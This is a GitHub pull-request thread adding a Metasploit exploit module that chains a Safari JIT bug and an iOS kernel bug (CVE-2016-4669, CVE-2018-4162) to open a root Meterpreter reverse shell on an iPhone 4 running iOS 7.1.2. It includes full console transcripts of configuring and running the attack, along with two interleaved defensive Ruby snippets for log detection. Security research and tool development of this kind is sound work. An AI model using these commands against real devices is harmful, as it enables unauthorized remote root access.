Add module for an iPhone 4 iOS 7.1.2 #13911

Merged
merged 5 commits into from
Aug 14, 2020

Conversation

timwr
Contributor

@timwr timwr commented Jul 27, 2020

This module exploits a Safari JIT vulnerability and an iOS kernel vulnerability in order to launch meterpreter on iOS 7.1.2 (tested on a fully updated iPhone 4).
Ping @kudima @WanderingGlitch @h00die

Verification

Demonstration

iPhone 4

msf5 > use exploit/apple_ios/browser/safari_jit
[*] Using configured payload apple_ios/armle/meterpreter_reverse_tcp
msf5 exploit(apple_ios/browser/safari_jit) > set LHOST 192.168.43.200
LHOST => 192.168.43.200
msf5 exploit(apple_ios/browser/safari_jit) > set SRVHOST 192.168.43.200
SRVHOST => 192.168.43.200
msf5 exploit(apple_ios/browser/safari_jit) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(apple_ios/browser/safari_jit) >
[*] Started reverse TCP handler on 192.168.43.200:4444
[*] Using URL: http://192.168.43.200:8080/
[*] Server started.

msf5 exploit(apple_ios/browser/safari_jit) >
[*] 192.168.43.205   safari_jit - Request / from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 192.168.43.205   safari_jit - Request /loader.b64?cache=1595831577372 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 192.168.43.205   safari_jit - Request /macho.b64?cache=1595831577670 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 192.168.43.205   safari_jit - Request /payload from MobileSafari/9537.53 CFNetwork/672.1.15 Darwin/14.0.0
[+] 192.168.43.205   safari_jit - Target is vulnerable, sending payload!
[*] Meterpreter session 1 opened (192.168.43.200:4444 -> 192.168.43.205:49175) at 2020-07-27 14:33:07 +0800

msf5 exploit(apple_ios/browser/safari_jit) > sessions

Active sessions
===============

  Id  Name  Type                         Information                                                    Connection
  --  ----  ----                         -----------                                                    ----------
  1         meterpreter armle/apple_ios  root @ iPhone (uid=0, gid=0, euid=0, egid=0) @ 192.168.43.205  192.168.43.200:4444 -> 192.168.43.205:49175 (192.168.43.205)

TODO

  • Think of a better module name than safari_jit
  • Documentation
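The module output above decides that the client is a target from the MobileSafari User-Agent, which reports the iOS version (`iPhone OS 7_1_2`) and build (`Mobile/11D257`). The following is an added example, not code from this PR or from Metasploit, that parses that same User-Agent layout so a web or proxy log can flag clients running an iOS release below a minimum you set; the minimum version used in the test run is a constructed policy value, not something the page states. It is in Ruby because Metasploit modules are Ruby.

```ruby
# Added example (not part of the PR or of Metasploit): extract the iOS version
# and build from a stock MobileSafari User-Agent and compare it against a policy
# minimum. Assumes the layout
#   "... (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) ... Mobile/11D257 ..."
IOS_UA_RE = %r{\(iPhone; CPU iPhone OS (?<ver>\d+(?:_\d+)*) like Mac OS X\).*?\bMobile/(?<build>[0-9A-Z]+)}

# The two User-Agent strings seen in the module output above, plus one
# constructed non-iOS client for contrast.
SAMPLE_AGENTS = [
  'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
  'MobileSafari/9537.53 CFNetwork/672.1.15 Darwin/14.0.0',
  'Mozilla/5.0 (Windows NT 10.0; Win64; x64) constructed/1.0',
].freeze

# Returns { version: [major, minor, patch], build: "11D257" } or nil when the
# string is not a MobileSafari UA carrying a version.
def parse_ios_ua(ua)
  m = IOS_UA_RE.match(ua)
  return nil unless m
  parts = m[:ver].split('_').map(&:to_i)
  parts << 0 while parts.length < 3 # normalise "7_1" to [7, 1, 0]
  { version: parts, build: m[:build] }
end

# Array <=> compares element by element, so [7, 1, 2] <=> [10, 1, 0] == -1.
def version_below?(version, minimum)
  (version <=> minimum) == -1
end

# Classifies one UA. CFNetwork-style agents (the /payload fetch in the output
# above) carry no iOS version, so they are reported as :unknown, not guessed.
def assess_ios_client(ua, min_version:)
  info = parse_ios_ua(ua)
  return { client: :unknown, ua: ua } unless info
  {
    client: :ios,
    version: info[:version].join('.'),
    build: info[:build],
    below_minimum: version_below?(info[:version], min_version),
  }
end

# How many agents in a batch are iOS clients below the policy minimum.
def count_outdated(agents, min_version:)
  agents.count { |ua| assess_ios_client(ua, min_version: min_version)[:below_minimum] }
end

if __FILE__ == $PROGRAM_NAME
  # [12, 0, 0] is a constructed policy value for the demonstration run.
  SAMPLE_AGENTS.each { |ua| p assess_ios_client(ua, min_version: [12, 0, 0]) }
end
```

Run with `ruby ios_ua_check.rb` to see one `:ios` record flagged as below the minimum, one `:unknown` record for the CFNetwork fetch, and one `:unknown` for the constructed desktop agent. The version is kept as an integer array rather than a string so that `7.1.2` sorts correctly below `10.1.0`; a plain string comparison would get that wrong.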

@h00die
Contributor

h00die commented Jul 27, 2020

I'll pick this up since I have the phone and have been testing with @timwr

@label-actions

label-actions bot commented Jul 28, 2020

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

Review threads (all resolved, now outdated) on external/source/exploits/CVE-2016-4669/shell.m (5) and modules/exploits/apple_ios/browser/safari_jit.rb (5).

@timwr timwr force-pushed the ios_7 branch 2 times, most recently from 9f883da to 117e587 July 30, 2020 10:10
@h00die
Contributor

h00die commented Aug 4, 2020

still need module docs :)

@h00die
Contributor

h00die commented Aug 4, 2020

Logs on the phone look much better:

Aug  4 12:08:28 amfid[131] <Error>: /bin/G73uoN not valid: 0xe800801c: No code signature found.                                        
Aug  4 12:08:28 kernel[0] <Debug>: AMFI: Invalid signature but permitting execution     
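The two phone log lines above are the trace a defender would look for: amfid refuses an unsigned binary, and the kernel's AMFI hook permits execution anyway, which a stock device should never report. The following is an added example, not code from this PR or from Metasploit, that parses iOS 7-era syslog lines in that layout and raises a finding only when a refusal is overridden within a short window; the two page lines are used as input together with two constructed lines. It is in Ruby because Metasploit is Ruby.

```ruby
# Added example (not part of the PR or of Metasploit): detect the
# "amfid refused, kernel permitted anyway" pair in iOS syslog output.
# Assumes the line layout "Mon  d HH:MM:SS proc[pid] <Level>: message".

# One syslog record: timestamp, process, pid, level, free-text message.
SYSLOG_RE = /\A(?<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?<proc>[\w.-]+)\[(?<pid>\d+)\] <(?<level>\w+)>: (?<msg>.*)\z/

# amfid refusing a binary: "/path not valid: 0xe800801c: No code signature found."
AMFID_REJECT_RE = /\A(?<path>\S+) not valid: (?<code>0x[0-9a-fA-F]+): (?<reason>.*)\z/

# The kernel overriding that refusal.
AMFI_PERMIT_RE = /\AAMFI: Invalid signature but permitting execution/

# Sample input: the two lines quoted in the comment above, plus two constructed
# lines (a normal refusal that is never overridden, and an unrelated message).
SAMPLE_LOG = [
  'Aug  4 12:07:10 amfid[131] <Error>: /var/mobile/Media/constructed not valid: 0xe800801c: No code signature found.',
  'Aug  4 12:07:11 SpringBoard[58] <Warning>: constructed unrelated line',
  'Aug  4 12:08:28 amfid[131] <Error>: /bin/G73uoN not valid: 0xe800801c: No code signature found.',
  'Aug  4 12:08:28 kernel[0] <Debug>: AMFI: Invalid signature but permitting execution',
].freeze

def parse_syslog_line(line)
  m = SYSLOG_RE.match(line.strip)
  return nil unless m
  { ts: m[:ts], proc: m[:proc], pid: m[:pid].to_i, level: m[:level], msg: m[:msg] }
end

# Seconds since midnight; enough to pair lines within one day (syslog carries no year).
def seconds_of_day(ts)
  h, m, s = ts.split(' ').last.split(':').map(&:to_i)
  h * 3600 + m * 60 + s
end

# Returns one finding per amfid refusal that the kernel overrides within
# `window` seconds. A refusal that is never overridden is normal and yields nothing.
def detect_amfi_override(lines, window: 2)
  findings = []
  pending = [] # recent refusals not yet paired with a permit line
  lines.each do |line|
    rec = parse_syslog_line(line)
    next unless rec
    if rec[:proc] == 'amfid'
      m = AMFID_REJECT_RE.match(rec[:msg])
      pending << rec.merge(path: m[:path], code: m[:code], reason: m[:reason]) if m
    elsif rec[:proc] == 'kernel' && AMFI_PERMIT_RE.match?(rec[:msg])
      now = seconds_of_day(rec[:ts])
      pending.reject! { |r| now - seconds_of_day(r[:ts]) > window } # drop stale refusals
      rej = pending.pop # most recent refusal inside the window, if any
      in_system_dir = rej && rej[:path].start_with?('/bin/', '/sbin/', '/tmp/', '/private/tmp/')
      findings << {
        ts: rec[:ts],
        path: rej && rej[:path],
        code: rej && rej[:code],
        reason: rej && rej[:reason],
        severity: in_system_dir ? 'high' : 'medium',
      }
    end
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  detect_amfi_override(SAMPLE_LOG).each { |f| puts f.inspect }
end
```

On the sample input this reports exactly one finding, for `/bin/G73uoN`, because the 12:07:10 refusal is older than the window and stays refused. The permit line is flagged even when no refusal can be paired with it, since that message alone is the anomaly; the pairing only adds the path and error code for triage.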

@h00die
Contributor

h00die commented Aug 4, 2020

Working for me:

msf5 > use safari_jit
[*] Using configured payload apple_ios/armle/meterpreter_reverse_tcp

Matching Modules
================

   #  Name                                  Disclosure Date  Rank  Check  Description
   -  ----                                  ---------------  ----  -----  -----------
   0  exploit/apple_ios/browser/safari_jit  2016-08-25       good  No     Safari Webkit JIT Exploit for iOS 7.1.2


[*] Using exploit/apple_ios/browser/safari_jit
msf5 exploit(apple_ios/browser/safari_jit) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf5 exploit(apple_ios/browser/safari_jit) > set srvhost 1.1.1.1
srvhost => 1.1.1.1
msf5 exploit(apple_ios/browser/safari_jit) > set verbose true
verbose => true
msf5 exploit(apple_ios/browser/safari_jit) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(apple_ios/browser/safari_jit) > 
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Using URL: http://1.1.1.1:8080/
[*] Server started.
[*] 2.2.2.2    safari_jit - Request / from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2    safari_jit - Request /loader.b64?cache=1596557302841 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2    safari_jit - Request /macho.b64?cache=1596557303179 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2    safari_jit - Request /payload from MobileSafari/9537.53 CFNetwork/672.1.15 Darwin/14.0.0
[+] 2.2.2.2    safari_jit - Target is vulnerable, sending payload!
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:49299) at 2020-08-04 12:08:27 -0400
sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root @ iPhone (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 2.2.2.2
OS           : iPhone3,3 (iOS 11D257)
Architecture : armv7
BuildTuple   : arm-iphone-darwin
Meterpreter  : armle/apple_ios
meterpreter > pwd
/
meterpreter > ls
Listing: /
==========

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40333/-wx-wx-wx   68    dir   2014-12-16 11:01:46 -0500  .Trashes
100000/---------  0     fil   2014-12-16 11:01:55 -0500  .file
40775/rwxrwxr-x   1938  dir   2014-12-16 11:14:45 -0500  Applications
40775/rwxrwxr-x   68    dir   2014-12-16 11:01:47 -0500  Developer
40775/rwxrwxr-x   578   dir   2014-12-16 11:15:48 -0500  Library
40755/rwxr-xr-x   102   dir   2014-12-16 11:15:26 -0500  System
40755/rwxr-xr-x   170   dir   2020-08-04 12:08:28 -0400  bin
40775/rwxrwxr-x   68    dir   2014-12-16 11:01:54 -0500  cores
40555/r-xr-xr-x   1676  dir   2020-08-04 11:56:30 -0400  dev
40755/rwxr-xr-x   578   dir   2014-12-16 11:15:49 -0500  etc
40755/rwxr-xr-x   136   dir   2014-12-16 11:15:47 -0500  private
40755/rwxr-xr-x   476   dir   2014-12-16 11:15:49 -0500  sbin
41777/rwxrwxrwx   510   dir   2020-08-04 12:01:15 -0400  tmp
40755/rwxr-xr-x   272   dir   2014-12-16 11:15:47 -0500  usr
40755/rwxr-xr-x   952   dir   2020-06-08 11:41:23 -0400  var

meterpreter >

@h00die h00die added the blocked Blocked by one or more additional tasks label Aug 4, 2020
@h00die
Contributor

h00die commented Aug 4, 2020

Module working, everything as expected. Just need some docs and to wait a few days.

@timwr timwr requested a review from h00die August 5, 2020 09:39
@h00die h00die removed blocked Blocked by one or more additional tasks needs-docs labels Aug 13, 2020
@h00die
Contributor

h00die commented Aug 13, 2020

timwr#12

@h00die h00die merged commit cd41d9c into rapid7:master Aug 14, 2020
@h00die
Contributor

h00die commented Aug 14, 2020

Release Notes

New module exploits/apple_ios/browser/safari_jit adds a Safari exploit for iOS 7.1.2 to obtain a root-level shell by leveraging multiple exploits chained together (CVE-2016-4669, CVE-2018-4162). iPhone 4 was specifically targeted and verified for this exploit.

@adfoster-r7 adfoster-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 24, 2020